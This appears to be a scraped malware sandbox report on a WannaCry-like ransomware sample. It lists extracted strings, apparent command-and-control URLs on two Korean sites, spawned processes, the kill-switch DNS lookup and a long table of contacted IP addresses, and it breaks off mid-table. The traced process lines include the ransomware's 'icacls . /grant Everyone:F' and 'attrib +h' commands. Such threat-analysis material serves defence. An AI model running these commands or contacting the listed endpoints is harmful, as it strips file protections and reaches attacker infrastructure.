application/octet-stream S^-----------------------------7d414e351603fa-- S^-----------------------------7d414e351603faContent-Disposition: form-data; name="" S^-----------------------------7d414e351603faContent-Disposition: form-data; name="" S^[ %d.%d.%d %d:%d:%d ] S^bind S^Content-Type: multipart/form-data; boundary=---------------------------7d414e351603fa S^Could not accept new connection S^gethostbyname S^gethostname S^getpeername S^getsockname S^http://lawbookcenter.co.kr/shop/temp/goods_list.php S^http://solarshade.co.kr/eml/goods_list_ok.php S^http=http://%s S^HttpAddRequestHeadersA S^HttpEndRequestA S^HttpOpenRequestA S^HttpQueryInfoA S^HttpSendRequestA S^HttpSendRequestExA S^InternetGetConnectedState S^IPv6 not supported S^IRC session terminated S^listen S^Mozilla/4.0 (compatible; MSIE 6.0; Win32) S^No error S^POST S^Read error S^Remote connection closed S^Socket error S^SOFTWARE\\Microsoft\\Internet Explorer\\Config\\Package S^SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion S^Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ComputerDescriptions S^Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings S^Timeout error S^Write error S^WSAGetLastError searchindexer.exe Service Requested is already running. ServiceDll SetLastError ShellExecuteExW SHGetFolderPathW SING error solarshade.co.kr ssembly xmlns=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0"">true rundll32.exe ""C:\\2a8efbfadd798f6111340f7c1c956bee.dll"",PlayGame (PID: 2388) mssecsvc.exe (PID: 2376) tasksche.exe /i (PID: 736) 58/66 tasksche.exe (PID: 3032) 58/66 attrib.exe attrib +h . (PID: 3372) icacls.exe icacls . /grant Everyone:F /T /C /Q (PID: 2972) attrib.exe attrib +h . (PID: 3744) icacls.exe icacls . /grant Everyone:F /T /C /Q (PID: 3732) mssecsvc.exe -m security (PID: 2368) tasksche.exe (PID: 2136) 58/66 attrib.exe attrib +h . (PID: 2344) icacls.exe icacls . /grant Everyone:F /T /C /Q (PID: 2672) ... and some more processes with no relevance. Logged Script Calls Logged Stdout Extracted Streams Memory Dumps Reduced Monitoring Network Activity Network Error Multiscan Match Network Analysis DNS Requests Domain Address Registrar Country www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com 104.17.40.137 TTL: 299 NAMECHEAP INC Name Server: BRUCE.NS.CLOUDFLARE.COM Creation Date: Fri, 12 May 2017 00:00:00 GMT Flag of United States United States Contacted Hosts Displaying the first 1000 contacted hosts. The remaining 2088 entries are available in the full report, but download of the full report is disabled. IP Address Port/Protocol Associated Process Details 104.17.40.137 80 TCP mssecsvc.exe PID: 2376 mssecsvc.exe PID: 2368 Flag of United States United States 41.140.144.229 63894 TCP mssecsvc.exe PID: 2368 Flag of Morocco Morocco 70.104.219.196 63907 TCP mssecsvc.exe PID: 2368 Flag of United States United States 27.226.17.13 63915 TCP mssecsvc.exe PID: 2368 Flag of China China 66.59.179.216 63919 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 93.104.128.203 63928 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 27.79.216.46 63931 TCP mssecsvc.exe PID: 2368 Flag of Viet Nam Viet Nam 138.220.153.64 63939 TCP mssecsvc.exe PID: 2368 Flag of United States United States 8.185.167.2 63940 TCP mssecsvc.exe PID: 2368 Flag of United States United States 221.74.189.40 63943 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 158.122.188.35 63952 TCP mssecsvc.exe PID: 2368 Flag of United States United States 47.246.198.1 63954 TCP mssecsvc.exe PID: 2368 Flag of United States United States 43.100.114.153 63957 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 78.105.95.52 63965 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 96.69.251.55 63968 TCP mssecsvc.exe PID: 2368 Flag of United States United States 60.102.99.16 63970 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 152.104.244.150 63972 TCP mssecsvc.exe PID: 2368 Flag of China China 152.213.60.160 63980 TCP mssecsvc.exe PID: 2368 Flag of United States United States 1.23.9.46 63985 TCP mssecsvc.exe PID: 2368 Flag of India India 86.65.210.178 63986 TCP mssecsvc.exe PID: 2368 Flag of France France 162.85.217.157 63989 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 208.110.147.55 63995 TCP mssecsvc.exe PID: 2368 Flag of United States United States 22.201.149.45 63996 TCP mssecsvc.exe PID: 2368 Flag of United States United States 140.16.131.208 64001 TCP mssecsvc.exe PID: 2368 Flag of United States United States 150.66.208.64 64002 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 143.225.183.27 64006 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 164.158.164.141 64011 TCP mssecsvc.exe PID: 2368 Flag of United States United States 109.243.206.29 64013 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 182.94.167.7 64017 TCP mssecsvc.exe PID: 2368 Flag of India India 92.26.237.228 64019 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 47.225.124.196 64023 TCP mssecsvc.exe PID: 2368 Flag of United States United States 161.185.187.238 64026 TCP mssecsvc.exe PID: 2368 Flag of United States United States 183.109.77.34 64028 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 198.166.53.97 64032 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 99.204.97.153 64036 TCP mssecsvc.exe PID: 2368 Flag of United States United States 104.221.73.178 64037 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 152.184.109.163 64042 TCP mssecsvc.exe PID: 2368 Flag of United States United States 160.124.204.92 64043 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 51.228.114.57 64046 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 143.81.20.200 64050 TCP mssecsvc.exe PID: 2368 Flag of United States United States 139.116.66.184 64054 TCP mssecsvc.exe PID: 2368 Flag of Norway Norway 140.227.23.108 64056 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 113.204.142.0 64059 TCP mssecsvc.exe PID: 2368 Flag of China China 59.32.186.179 64060 TCP mssecsvc.exe PID: 2368 Flag of China China 181.49.247.174 64062 TCP mssecsvc.exe PID: 2368 Flag of Colombia Colombia 24.236.246.74 64065 TCP mssecsvc.exe PID: 2368 Flag of United States United States 212.211.59.72 64068 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 89.153.13.102 64074 TCP mssecsvc.exe PID: 2368 Flag of Portugal Portugal 201.137.111.73 64075 TCP mssecsvc.exe PID: 2368 Flag of Mexico Mexico 158.72.17.85 64077 TCP mssecsvc.exe PID: 2368 Flag of United States United States 77.32.134.104 64079 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 217.43.232.159 64080 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 159.165.236.177 64085 TCP mssecsvc.exe PID: 2368 Flag of United States United States 191.70.55.199 64087 TCP mssecsvc.exe PID: 2368 Flag of Colombia Colombia 194.70.78.46 64092 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 214.117.225.188 64094 TCP mssecsvc.exe PID: 2368 Flag of United States United States 14.206.83.138 64095 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 85.234.40.227 64097 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 194.195.248.125 64098 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 9.39.235.76 64101 TCP mssecsvc.exe PID: 2368 Flag of United States United States 135.170.147.185 64104 TCP mssecsvc.exe PID: 2368 Flag of United States United States 158.109.83.241 64108 TCP mssecsvc.exe PID: 2368 Flag of Spain Spain 53.84.31.105 64113 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 59.51.251.120 64114 TCP mssecsvc.exe PID: 2368 Flag of China China 18.23.141.242 64115 TCP mssecsvc.exe PID: 2368 Flag of United States United States 34.154.55.28 64117 TCP mssecsvc.exe PID: 2368 Flag of United States United States 123.211.105.225 64119 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 135.156.127.250 64122 TCP mssecsvc.exe PID: 2368 Flag of United States United States 118.142.186.196 64125 TCP mssecsvc.exe PID: 2368 Flag of Hong Kong Hong Kong 9.113.250.242 64128 TCP mssecsvc.exe PID: 2368 Flag of United States United States 43.79.150.31 64129 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 6.57.116.91 64132 TCP mssecsvc.exe PID: 2368 Flag of United States United States 167.170.186.35 64134 TCP mssecsvc.exe PID: 2368 Flag of United States United States 75.146.253.239 64135 TCP mssecsvc.exe PID: 2368 Flag of United States United States 154.1.142.55 64136 TCP mssecsvc.exe PID: 2368 Flag of United States United States 9.181.223.212 64139 TCP mssecsvc.exe PID: 2368 Flag of United States United States 103.87.125.234 64142 TCP mssecsvc.exe PID: 2368 Flag of Sri Lanka Sri Lanka 114.114.183.45 64145 TCP mssecsvc.exe PID: 2368 Flag of China China 51.208.106.81 64147 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 199.151.110.112 64149 TCP mssecsvc.exe PID: 2368 Flag of United States United States 216.164.99.136 64151 TCP mssecsvc.exe PID: 2368 Flag of United States United States 112.250.61.157 64153 TCP mssecsvc.exe PID: 2368 Flag of China China 171.46.48.199 64154 TCP mssecsvc.exe PID: 2368 Flag of China China 89.119.42.217 64156 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 126.204.79.107 64159 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 215.254.197.247 64161 TCP mssecsvc.exe PID: 2368 Flag of United States United States 133.117.20.228 64166 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 126.213.47.130 64167 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 120.108.74.237 64171 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 15.159.214.54 64172 TCP mssecsvc.exe PID: 2368 Flag of United States United States 173.35.45.34 64174 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 24.162.174.109 64175 TCP mssecsvc.exe PID: 2368 Flag of United States United States 210.252.69.155 64177 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 190.14.10.65 64180 TCP mssecsvc.exe PID: 2368 Flag of Argentina Argentina 176.170.23.123 64182 TCP mssecsvc.exe PID: 2368 Flag of France France 153.253.197.109 64183 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 150.102.247.236 64188 TCP mssecsvc.exe PID: 2368 Flag of United States United States 203.65.60.40 64189 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 178.80.23.2 64192 TCP mssecsvc.exe PID: 2368 Flag of Saudi Arabia Saudi Arabia 193.214.180.155 64193 TCP mssecsvc.exe PID: 2368 Flag of Norway Norway 13.181.230.220 64196 TCP mssecsvc.exe PID: 2368 Flag of United States United States 9.38.48.18 64198 TCP mssecsvc.exe PID: 2368 Flag of United States United States 34.154.88.212 64199 TCP mssecsvc.exe PID: 2368 Flag of United States United States 199.92.0.167 64202 TCP mssecsvc.exe PID: 2368 Flag of United States United States 198.74.181.9 64203 TCP mssecsvc.exe PID: 2368 Flag of United States United States 42.48.68.235 64206 TCP mssecsvc.exe PID: 2368 Flag of China China 199.174.222.89 64207 TCP mssecsvc.exe PID: 2368 Flag of United States United States 72.104.13.45 64212 TCP mssecsvc.exe PID: 2368 Flag of United States United States 69.215.70.230 64213 TCP mssecsvc.exe PID: 2368 Flag of United States United States 211.162.154.136 64215 TCP mssecsvc.exe PID: 2368 Flag of China China 112.19.68.7 64216 TCP mssecsvc.exe PID: 2368 Flag of China China 4.46.199.78 64219 TCP mssecsvc.exe PID: 2368 Flag of United States United States 60.111.216.174 64221 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 48.94.43.251 64224 TCP mssecsvc.exe PID: 2368 Flag of United States United States 170.163.243.21 64225 TCP mssecsvc.exe PID: 2368 Flag of United States United States 197.56.35.157 64228 TCP mssecsvc.exe PID: 2368 Flag of Egypt Egypt 151.132.127.26 64231 TCP mssecsvc.exe PID: 2368 Flag of United States United States 188.103.135.114 64233 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 74.232.108.85 64236 TCP mssecsvc.exe PID: 2368 Flag of United States United States 218.215.235.98 64237 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 217.78.127.8 64239 TCP mssecsvc.exe PID: 2368 Flag of Switzerland Switzerland 210.16.140.201 64240 TCP mssecsvc.exe PID: 2368 Flag of China China 34.58.8.152 64244 TCP mssecsvc.exe PID: 2368 Flag of United States United States 16.45.186.90 64245 TCP mssecsvc.exe PID: 2368 Flag of United States United States 16.185.50.242 64246 TCP mssecsvc.exe PID: 2368 Flag of United States United States 178.133.97.123 64247 TCP mssecsvc.exe PID: 2368 Flag of Ukraine Ukraine 98.193.42.197 64248 TCP mssecsvc.exe PID: 2368 Flag of United States United States 89.66.222.109 64249 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 28.247.92.246 64252 TCP mssecsvc.exe PID: 2368 Flag of United States United States 104.56.169.220 64254 TCP mssecsvc.exe PID: 2368 Flag of United States United States 38.230.239.86 64258 TCP mssecsvc.exe PID: 2368 Flag of United States United States 102.177.40.141 64259 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 86.111.193.43 64261 TCP mssecsvc.exe PID: 2368 Flag of Saudi Arabia Saudi Arabia 118.251.201.207 64262 TCP mssecsvc.exe PID: 2368 Flag of China China 48.54.143.206 64265 TCP mssecsvc.exe PID: 2368 Flag of United States United States 2.163.198.235 64266 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 16.93.214.139 64267 TCP mssecsvc.exe PID: 2368 Flag of United States United States 204.141.142.178 64268 TCP mssecsvc.exe PID: 2368 Flag of United States United States 22.62.245.9 64269 TCP mssecsvc.exe PID: 2368 Flag of United States United States 145.83.156.100 64270 TCP mssecsvc.exe PID: 2368 Flag of Netherlands Netherlands 96.205.182.92 64273 TCP mssecsvc.exe PID: 2368 Flag of United States United States 122.188.184.109 64274 TCP mssecsvc.exe PID: 2368 Flag of China China 26.81.156.214 64279 TCP mssecsvc.exe PID: 2368 Flag of United States United States 84.55.180.229 64280 TCP mssecsvc.exe PID: 2368 Flag of France France 181.247.125.20 64282 TCP mssecsvc.exe PID: 2368 Flag of Colombia Colombia 29.33.152.9 64284 TCP mssecsvc.exe PID: 2368 Flag of United States United States 13.125.180.91 64290 TCP mssecsvc.exe PID: 2368 Flag of United States United States 96.197.172.11 64291 TCP mssecsvc.exe PID: 2368 Flag of United States United States 159.231.86.189 64292 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 169.171.254.25 64293 TCP mssecsvc.exe PID: 2368 Flag of United States United States 173.11.128.180 64294 TCP mssecsvc.exe PID: 2368 Flag of United States United States 36.132.31.22 64295 TCP mssecsvc.exe PID: 2368 Flag of China China 35.23.189.14 64297 TCP mssecsvc.exe PID: 2368 Flag of United States United States 46.157.184.54 64299 TCP mssecsvc.exe PID: 2368 Flag of Norway Norway 40.199.66.13 64301 TCP mssecsvc.exe PID: 2368 Flag of United States United States 101.22.112.126 64304 TCP mssecsvc.exe PID: 2368 Flag of China China 141.31.145.59 64305 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 217.30.149.1 64309 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 66.106.7.118 64311 TCP mssecsvc.exe PID: 2368 Flag of United States United States 98.234.201.226 64314 TCP mssecsvc.exe PID: 2368 Flag of United States United States 145.203.212.111 64315 TCP mssecsvc.exe PID: 2368 Flag of Netherlands Netherlands 100.70.7.196 64316 TCP mssecsvc.exe PID: 2368 Flag of Reserved Reserved 29.62.92.19 64317 TCP mssecsvc.exe PID: 2368 Flag of United States United States 77.127.29.161 64319 TCP mssecsvc.exe PID: 2368 Flag of Israel Israel 151.231.218.95 64320 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 167.228.69.213 64322 TCP mssecsvc.exe PID: 2368 Flag of United States United States 166.94.167.21 64323 TCP mssecsvc.exe PID: 2368 Flag of United States United States 68.125.136.230 64324 TCP mssecsvc.exe PID: 2368 Flag of United States United States 52.240.60.46 64325 TCP mssecsvc.exe PID: 2368 Flag of United States United States 20.196.98.15 64326 TCP mssecsvc.exe PID: 2368 Flag of United States United States 169.83.194.98 64327 TCP mssecsvc.exe PID: 2368 Flag of United States United States 48.28.131.14 64328 TCP mssecsvc.exe PID: 2368 Flag of United States United States 205.27.170.10 64329 TCP mssecsvc.exe PID: 2368 Flag of United States United States 95.212.244.87 64330 TCP mssecsvc.exe PID: 2368 Flag of Egypt Egypt 155.7.7.18 64331 TCP mssecsvc.exe PID: 2368 Flag of United States United States 120.135.158.162 64332 TCP mssecsvc.exe PID: 2368 Flag of China China 22.140.133.202 64333 TCP mssecsvc.exe PID: 2368 Flag of United States United States 86.151.109.123 64334 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 25.163.21.174 64335 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 47.204.199.25 64336 TCP mssecsvc.exe PID: 2368 Flag of United States United States 125.24.104.119 64337 TCP mssecsvc.exe PID: 2368 Flag of Thailand Thailand 222.12.155.200 64338 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 149.245.176.4 64339 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 14.205.221.118 64340 TCP mssecsvc.exe PID: 2368 Flag of China China 53.238.158.160 64341 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 191.108.182.215 64342 TCP mssecsvc.exe PID: 2368 Flag of Colombia Colombia 119.116.49.47 64343 TCP mssecsvc.exe PID: 2368 Flag of China China 134.17.18.80 64344 TCP mssecsvc.exe PID: 2368 Flag of Belarus Belarus 151.206.198.91 64345 TCP mssecsvc.exe PID: 2368 Flag of United States United States 78.160.89.174 64346 TCP mssecsvc.exe PID: 2368 Flag of Turkey Turkey 208.31.199.109 64348 TCP mssecsvc.exe PID: 2368 Flag of United States United States 164.7.112.80 64349 TCP mssecsvc.exe PID: 2368 Flag of France France 129.108.73.230 64350 TCP mssecsvc.exe PID: 2368 Flag of United States United States 74.73.52.39 64351 TCP mssecsvc.exe PID: 2368 Flag of United States United States 175.230.118.46 64352 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 96.41.191.110 64353 TCP mssecsvc.exe PID: 2368 Flag of United States United States 45.237.3.177 64354 TCP mssecsvc.exe PID: 2368 Flag of Paraguay Paraguay 7.200.181.190 64355 TCP mssecsvc.exe PID: 2368 Flag of United States United States 38.228.74.88 64356 TCP mssecsvc.exe PID: 2368 Flag of United States United States 217.21.24.189 64357 TCP mssecsvc.exe PID: 2368 Flag of Hungary Hungary 98.92.26.95 64358 TCP mssecsvc.exe PID: 2368 Flag of United States United States 12.103.164.5 64359 TCP mssecsvc.exe PID: 2368 Flag of United States United States 74.247.116.157 64361 TCP mssecsvc.exe PID: 2368 Flag of United States United States 208.113.120.128 64362 TCP mssecsvc.exe PID: 2368 Flag of United States United States 78.2.52.217 64363 TCP mssecsvc.exe PID: 2368 Flag of Croatia (LOCAL Name: Hrvatska) Croatia (LOCAL Name: Hrvatska) 68.135.72.177 64364 TCP mssecsvc.exe PID: 2368 Flag of United States United States 93.76.85.27 64365 TCP mssecsvc.exe PID: 2368 Flag of Ukraine Ukraine 56.211.137.103 64366 TCP mssecsvc.exe PID: 2368 Flag of United States United States 134.163.58.227 64367 TCP mssecsvc.exe PID: 2368 Flag of United States United States 18.32.209.61 64368 TCP mssecsvc.exe PID: 2368 Flag of United States United States 138.118.135.186 64369 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 222.46.174.102 64370 TCP mssecsvc.exe PID: 2368 Flag of China China 139.90.103.190 64371 TCP mssecsvc.exe PID: 2368 Flag of Belgium Belgium 95.213.137.49 64372 TCP mssecsvc.exe PID: 2368 Flag of Russian Federation Russian Federation 187.25.118.92 64373 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 121.5.23.63 64374 TCP mssecsvc.exe PID: 2368 Flag of China China 222.16.71.245 64375 TCP mssecsvc.exe PID: 2368 Flag of China China 76.62.205.140 64376 TCP mssecsvc.exe PID: 2368 Flag of United States United States 197.105.104.11 64377 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 100.46.132.122 64378 TCP mssecsvc.exe PID: 2368 Flag of United States United States 121.221.155.243 64379 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 82.113.206.226 64380 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 155.99.209.144 64381 TCP mssecsvc.exe PID: 2368 Flag of United States United States 131.76.159.207 64382 TCP mssecsvc.exe PID: 2368 Flag of United States United States 106.68.108.231 64383 TCP mssecsvc.exe PID: 2368 Flag of Australia Australia 22.144.183.167 64384 TCP mssecsvc.exe PID: 2368 Flag of United States United States 168.65.73.5 64385 TCP mssecsvc.exe PID: 2368 Flag of United States United States 204.91.64.153 64386 TCP mssecsvc.exe PID: 2368 Flag of United States United States 205.163.238.233 64387 TCP mssecsvc.exe PID: 2368 Flag of United States United States 148.235.238.86 64388 TCP mssecsvc.exe PID: 2368 Flag of Mexico Mexico 171.9.206.22 64389 TCP mssecsvc.exe PID: 2368 Flag of China China 112.173.180.111 64390 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 138.153.4.140 64391 TCP mssecsvc.exe PID: 2368 Flag of United States United States 210.160.110.189 64392 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 192.174.139.162 64393 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 207.120.28.47 64394 TCP mssecsvc.exe PID: 2368 Flag of United States United States 30.89.136.83 64395 TCP mssecsvc.exe PID: 2368 Flag of United States United States 41.10.35.115 64396 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 3.99.174.252 64397 TCP mssecsvc.exe PID: 2368 Flag of United States United States 16.185.94.65 64398 TCP mssecsvc.exe PID: 2368 Flag of United States United States 113.32.225.241 64399 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 31.102.66.39 64400 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 129.83.157.17 64401 TCP mssecsvc.exe PID: 2368 Flag of United States United States 206.86.81.159 64402 TCP mssecsvc.exe PID: 2368 Flag of United States United States 60.11.59.242 64403 TCP mssecsvc.exe PID: 2368 Flag of China China 82.128.80.220 64404 TCP mssecsvc.exe PID: 2368 Flag of Nigeria Nigeria 185.198.35.124 64405 TCP mssecsvc.exe PID: 2368 Flag of Lithuania Lithuania 136.129.139.119 64406 TCP mssecsvc.exe PID: 2368 Flag of United States United States 66.3.75.136 64407 TCP mssecsvc.exe PID: 2368 Flag of United States United States 76.204.91.15 64408 TCP mssecsvc.exe PID: 2368 Flag of United States United States 106.25.176.28 64409 TCP mssecsvc.exe PID: 2368 Flag of China China 80.50.189.225 64410 TCP mssecsvc.exe PID: 2368 Flag of Poland Poland 165.210.23.132 64411 TCP mssecsvc.exe PID: 2368 Flag of Cameroon Cameroon 119.199.240.72 64412 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 201.13.217.152 64413 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 45.100.90.117 64414 TCP mssecsvc.exe PID: 2368 Flag of Egypt Egypt 168.100.130.12 64415 TCP mssecsvc.exe PID: 2368 Flag of United States United States 66.87.20.108 64416 TCP mssecsvc.exe PID: 2368 Flag of United States United States 123.224.79.122 64417 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 21.80.190.213 64418 TCP mssecsvc.exe PID: 2368 Flag of United States United States 61.231.105.144 64419 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 91.32.213.120 64420 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 70.31.76.22 64421 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 146.12.118.109 64422 TCP mssecsvc.exe PID: 2368 Flag of United States United States 57.201.49.159 64423 TCP mssecsvc.exe PID: 2368 Flag of Belgium Belgium 20.58.167.214 64424 TCP mssecsvc.exe PID: 2368 Flag of United States United States 2.139.5.115 64425 TCP mssecsvc.exe PID: 2368 Flag of Spain Spain 134.208.57.227 64426 TCP mssecsvc.exe PID: 2368 Flag of Taiwan; Republic of China (ROC) Taiwan; Republic of China (ROC) 175.172.136.38 64427 TCP mssecsvc.exe PID: 2368 Flag of China China 166.190.227.97 64428 TCP mssecsvc.exe PID: 2368 Flag of United States United States 125.150.183.29 64429 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 74.240.216.231 64430 TCP mssecsvc.exe PID: 2368 Flag of United States United States 54.143.66.205 64431 TCP mssecsvc.exe PID: 2368 Flag of United States United States 64.85.50.5 64432 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 110.221.210.80 64433 TCP mssecsvc.exe PID: 2368 Flag of China China 61.152.114.171 64434 TCP mssecsvc.exe PID: 2368 Flag of China China 17.100.193.49 64435 TCP mssecsvc.exe PID: 2368 Flag of United States United States 27.164.46.116 64436 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 15.155.150.7 64437 TCP mssecsvc.exe PID: 2368 Flag of United States United States 212.85.156.158 64438 TCP mssecsvc.exe PID: 2368 Flag of France France 52.83.154.39 64439 TCP mssecsvc.exe PID: 2368 Flag of China China 129.178.234.138 64440 TCP mssecsvc.exe PID: 2368 Flag of Sweden Sweden 4.215.100.179 64441 TCP mssecsvc.exe PID: 2368 Flag of United States United States 71.224.68.40 64442 TCP mssecsvc.exe PID: 2368 Flag of United States United States 150.93.132.96 64443 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 43.252.136.251 64444 TCP mssecsvc.exe PID: 2368 Flag of Indonesia Indonesia 139.45.155.11 64445 TCP mssecsvc.exe PID: 2368 Flag of United States United States 31.138.201.235 64446 TCP mssecsvc.exe PID: 2368 Flag of Netherlands Netherlands 62.249.80.209 64448 TCP mssecsvc.exe PID: 2368 Flag of Austria Austria 25.97.41.79 64449 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 88.87.154.112 64450 TCP mssecsvc.exe PID: 2368 Flag of Spain Spain 55.101.128.14 64451 TCP mssecsvc.exe PID: 2368 Flag of United States United States 41.138.67.254 64452 TCP mssecsvc.exe PID: 2368 Flag of South Africa South Africa 31.251.221.192 64453 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 9.87.143.8 64454 TCP mssecsvc.exe PID: 2368 Flag of United States United States 192.69.154.85 64455 TCP mssecsvc.exe PID: 2368 Flag of United States United States 176.244.64.146 64456 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 144.112.188.43 64457 TCP mssecsvc.exe PID: 2368 Flag of United States United States 22.184.131.200 64458 TCP mssecsvc.exe PID: 2368 Flag of United States United States 190.65.104.226 64459 TCP mssecsvc.exe PID: 2368 Flag of Colombia Colombia 71.189.30.100 64460 TCP mssecsvc.exe PID: 2368 Flag of United States United States 87.19.34.169 64461 TCP mssecsvc.exe PID: 2368 Flag of Italy Italy 31.234.20.160 64462 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 112.157.1.62 64463 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 50.32.231.245 64464 TCP mssecsvc.exe PID: 2368 Flag of United States United States 36.164.228.183 64465 TCP mssecsvc.exe PID: 2368 Flag of China China 176.158.96.30 64466 TCP mssecsvc.exe PID: 2368 Flag of France France 31.82.203.167 64467 TCP mssecsvc.exe PID: 2368 Flag of United Kingdom United Kingdom 94.249.236.238 64468 TCP mssecsvc.exe PID: 2368 Flag of Germany Germany 220.211.81.248 64469 TCP mssecsvc.exe PID: 2368 Flag of Japan Japan 43.237.210.242 64470 TCP mssecsvc.exe PID: 2368 Flag of China China 198.211.49.92 64471 TCP mssecsvc.exe PID: 2368 Flag of United States United States 69.238.145.176 64472 TCP mssecsvc.exe PID: 2368 Flag of United States United States 39.189.8.113 64473 TCP mssecsvc.exe PID: 2368 Flag of China China 121.75.68.251 64474 TCP mssecsvc.exe PID: 2368 Flag of New Zealand New Zealand 78.30.24.82 64475 TCP mssecsvc.exe PID: 2368 Flag of Spain Spain 171.45.2.172 64476 TCP mssecsvc.exe PID: 2368 Flag of China China 83.89.148.234 64477 TCP mssecsvc.exe PID: 2368 Flag of Denmark Denmark 180.183.231.144 64478 TCP mssecsvc.exe PID: 2368 Flag of Thailand Thailand 24.203.93.39 64479 TCP mssecsvc.exe PID: 2368 Flag of Canada Canada 84.73.149.121 64480 TCP mssecsvc.exe PID: 2368 Flag of Switzerland Switzerland 104.25.164.67 64481 TCP mssecsvc.exe PID: 2368 Flag of United States United States 177.156.116.224 64482 TCP mssecsvc.exe PID: 2368 Flag of Brazil Brazil 112.186.160.173 64483 TCP mssecsvc.exe PID: 2368 Flag of Korea Republic of Korea Republic of 143.84.213.113 64484 TCP mssecsvc.exe PID: 2368 Flag of United States United States 151.174.188.150 64485 TCP mssecsvc.exe PID: 2368 Flag of United States United States 15.186.29.253 64486 TCP mssecsvc.exe PID: 2368 Flag of United States United States 8.22.152.70 64487 TCP mssecsvc.exe PID: 2368 Flag of United States United States 85.69.112.49 64488 TCP mssecsvc.exe PID: 2368 Flag of France France 160.34.78.96 64489 TCP mssecsvc.exe PID: 2368 Flag of United States United States 81.185.200.197 64490 TCP mssecsvc.exe PID: 2368 Flag of France France 84.236.17.35 64491 TCP mssecsvc.exe PID: 2368 Flag of Hungary Hungary 166.237.31.223 64492 TCP mssecsvc.exe PID: 2368 Flag of United States United States 201.125.59.7 64493 TCP mssecsvc.exe PID: 2368 Flag of Mexico Mexico 201.204.246.70 64494 TCP mssecsvc.exe PID: 